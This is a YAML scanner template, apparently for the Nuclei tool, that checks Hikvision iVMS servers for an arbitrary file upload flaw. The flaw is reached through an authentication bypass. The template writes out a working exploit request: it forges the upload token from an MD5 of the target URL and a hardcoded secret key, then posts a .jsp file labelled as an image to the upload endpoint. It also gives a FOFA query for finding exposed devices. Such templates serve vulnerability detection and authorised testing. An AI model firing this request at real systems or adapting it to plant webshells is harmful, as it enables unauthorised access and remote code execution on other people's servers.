37 lines
1.5 KiB
YAML
37 lines
1.5 KiB
YAML
id: hikvision-ivms-file-upload-bypass
|
|
|
|
info:
|
|
name: Hikvison iVMS - File Upload Bypass
|
|
author: SleepingBag945
|
|
severity: critical
|
|
description: Hikvision iVMS integrated security system has a vulnerability that allows arbitrary file uploads. Attackers can exploit this vulnerability by obtaining the encryption key to create a forged token. By using the forged token, they can make requests to the "/resourceOperations/upload" interface to upload files of their choice. This can lead to gaining unauthorized webshell access on the server, enabling remote execution of malicious code.
|
|
reference:
|
|
- https://blog.csdn.net/qq_41904294/article/details/130807691
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
fofa-query: icon_hash="-911494769"
|
|
tags: hikvision,ivms,intrusive,fileupload,auth-bypass
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /eps/api/resourceOperations/upload?token={{to_upper(md5(concat("{{RootURL}}","/eps/api/resourceOperations/uploadsecretKeyIbuilding")))}} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryGEJwiloiPo
|
|
|
|
------WebKitFormBoundaryGEJwiloiPo
|
|
Content-Disposition: form-data; name="fileUploader";filename="{{randstr}}.jsp"
|
|
Content-Type: image/jpeg
|
|
|
|
{{randstr}}
|
|
------WebKitFormBoundaryGEJwiloiPo%20
|
|
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"success":true'
|
|
- '"resourceName":'
|
|
condition: and
|